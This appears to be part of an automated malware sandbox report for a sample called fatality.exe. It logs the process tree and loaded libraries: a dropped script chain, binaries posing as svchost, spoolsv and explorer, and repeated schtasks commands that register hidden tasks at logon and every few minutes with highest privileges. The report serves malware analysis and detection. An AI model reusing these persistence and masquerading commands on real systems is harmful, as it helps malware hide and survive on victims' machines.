                                      Source: C:\Windows\Resources\spoolsv.exeProcess created: C:\Windows\Resources\svchost.exe c:\windows\resources\svchost.exe
                                      Source: C:\Users\user\Desktop\fatality.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbe"
                                      Source: C:\Windows\Resources\svchost.exeProcess created: C:\Windows\Resources\spoolsv.exe c:\windows\resources\spoolsv.exe PR
                                      Source: unknownProcess created: C:\Windows\Resources\Themes\explorer.exe "C:\windows\resources\themes\explorer.exe" RO
                                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockcomSession\R3z0peym99fhJdrKbUwEGrQMoM2HpnSPGrE0X0k2hc.bat" "
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\blockcomSession\containerReview.exe "C:\blockcomSession/containerReview.exe"
                                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\Resources\Themes\explorer.exe "C:\windows\resources\themes\explorer.exe" RO
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\blockcomSession\Idle.exe'" /f
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\blockcomSession\Idle.exe'" /rl HIGHEST /f
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 8 /tr "'C:\blockcomSession\Idle.exe'" /rl HIGHEST /f
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hr0ztmo\0hr0ztmo.cmdline"
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD8F5.tmp" "c:\Windows\System32\CSC8BED934F688E46C294B230B686E2243F.TMP"
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 9 /tr "'C:\blockcomSession\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /f
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzj" /sc ONLOGON /tr "'C:\blockcomSession\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /rl HIGHEST /f
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 10 /tr "'C:\blockcomSession\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /rl HIGHEST /f
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\blockcomSession\smss.exe'" /f
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\blockcomSession\smss.exe'" /rl HIGHEST /f
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\blockcomSession\smss.exe'" /rl HIGHEST /f
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 5 /tr "'C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /f
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzj" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /rl HIGHEST /f
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 14 /tr "'C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /rl HIGHEST /f
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 8 /tr "'C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /f
                                      Source: unknownProcess created: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe "C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe"
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzj" /sc ONLOGON /tr "'C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /rl HIGHEST /f
                                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 11 /tr "'C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /rl HIGHEST /f
                                      Source: unknownProcess created: C:\blockcomSession\Idle.exe C:\blockcomSession\Idle.exe
                                      Source: unknownProcess created: C:\blockcomSession\Idle.exe C:\blockcomSession\Idle.exe
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "containerReviewc" /sc MINUTE /mo 11 /tr "'C:\blockcomSession\containerReview.exe'" /f
                                      Source: unknownProcess created: C:\blockcomSession\smss.exe C:\blockcomSession\smss.exe
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "containerReview" /sc ONLOGON /tr "'C:\blockcomSession\containerReview.exe'" /rl HIGHEST /f
                                      Source: unknownProcess created: C:\blockcomSession\smss.exe C:\blockcomSession\smss.exe
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "containerReviewc" /sc MINUTE /mo 9 /tr "'C:\blockcomSession\containerReview.exe'" /rl HIGHEST /f
                                      Source: C:\Users\user\Desktop\fatality.exeProcess created: C:\Users\user\Desktop\fatality.exe c:\users\user\desktop\fatality.exe Jump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exeProcess created: C:\Windows\Resources\Themes\icsys.icn.exe C:\Windows\Resources\Themes\icsys.icn.exeJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbe" Jump to behavior
                                      Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess created: C:\Windows\Resources\Themes\explorer.exe c:\windows\resources\themes\explorer.exeJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeProcess created: C:\Windows\Resources\spoolsv.exe c:\windows\resources\spoolsv.exe SEJump to behavior
                                      Source: C:\Windows\Resources\spoolsv.exeProcess created: C:\Windows\Resources\svchost.exe c:\windows\resources\svchost.exeJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeProcess created: C:\Windows\Resources\spoolsv.exe c:\windows\resources\spoolsv.exe PRJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockcomSession\R3z0peym99fhJdrKbUwEGrQMoM2HpnSPGrE0X0k2hc.bat" "Jump to behavior
                                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\Resources\Themes\explorer.exe "C:\windows\resources\themes\explorer.exe" RO
                                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\blockcomSession\containerReview.exe "C:\blockcomSession/containerReview.exe"
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hr0ztmo\0hr0ztmo.cmdline"
                                      Source: C:\blockcomSession\containerReview.exeProcess created: unknown unknown
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD8F5.tmp" "c:\Windows\System32\CSC8BED934F688E46C294B230B686E2243F.TMP"
                                      Source: C:\Users\user\Desktop\fatality.exeSection loaded: apphelp.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exeSection loaded: msvbvm60.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exeSection loaded: vb6zz.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exeSection loaded: kernel.appcore.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exeSection loaded: uxtheme.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exeSection loaded: sxs.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: version.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: shfolder.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: uxtheme.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: windows.storage.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: wldp.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: profapi.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: sspicli.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: dxgidebug.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: sfc_os.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: rsaenh.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: dwmapi.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: cryptbase.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: riched20.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: usp10.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: msls31.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: kernel.appcore.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: iconcodecservice.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: windowscodecs.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: textshaping.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: textinputframework.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: coreuicomponents.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: coremessaging.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: ntmarta.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: coremessaging.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: wintypes.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: wintypes.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: wintypes.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: propsys.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: edputil.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: urlmon.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: iertutil.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: srvcli.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: netutils.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: windows.staterepositoryps.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: policymanager.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: msvcp110_win.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: appresolver.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: bcp47langs.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: slc.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: userenv.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: sppc.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: onecorecommonproxystub.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: onecoreuapcommonproxystub.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: pcacli.dllJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Section loaded: mpr.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\icsys.icn.exeSection loaded: apphelp.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\icsys.icn.exeSection loaded: msvbvm60.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\icsys.icn.exeSection loaded: vb6zz.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\icsys.icn.exeSection loaded: kernel.appcore.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\icsys.icn.exeSection loaded: uxtheme.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\icsys.icn.exeSection loaded: sxs.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: apphelp.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: msvbvm60.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: vb6zz.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: uxtheme.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: sxs.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: wininet.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: sspicli.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: iertutil.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: windows.storage.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: wldp.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: profapi.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: urlmon.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: srvcli.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: netutils.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: winhttp.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: mswsock.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: winnsi.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: dnsapi.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: rasadhlp.dllJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
                                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: apphelp.dllJump to behavior
                                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: msvbvm60.dllJump to behavior
                                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: vb6zz.dllJump to behavior
                                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: kernel.appcore.dllJump to behavior
                                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: uxtheme.dllJump to behavior
                                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: sxs.dllJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeSection loaded: apphelp.dllJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeSection loaded: msvbvm60.dllJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeSection loaded: vb6zz.dllJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeSection loaded: uxtheme.dllJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeSection loaded: sxs.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: msvbvm60.dll
                                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: vb6zz.dll
                                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: uxtheme.dll
                                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: sxs.dll
                                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: mscoree.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: apphelp.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: kernel.appcore.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: version.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: vcruntime140_clr0400.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: uxtheme.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: windows.storage.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: wldp.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: profapi.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: cryptsp.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: rsaenh.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: cryptbase.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: sspicli.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: ktmw32.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: ntmarta.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: wbemcomn.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: amsi.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: userenv.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: propsys.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: dlnashext.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: wpdshext.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: edputil.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: urlmon.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: iertutil.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: srvcli.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: netutils.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: windows.staterepositoryps.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: wintypes.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: appresolver.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: bcp47langs.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: slc.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: sppc.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: onecorecommonproxystub.dll
                                      Source: C:\blockcomSession\containerReview.exeSection loaded: onecoreuapcommonproxystub.dll
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: msvbvm60.dll
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: vb6zz.dll
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: uxtheme.dll
                                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: sxs.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
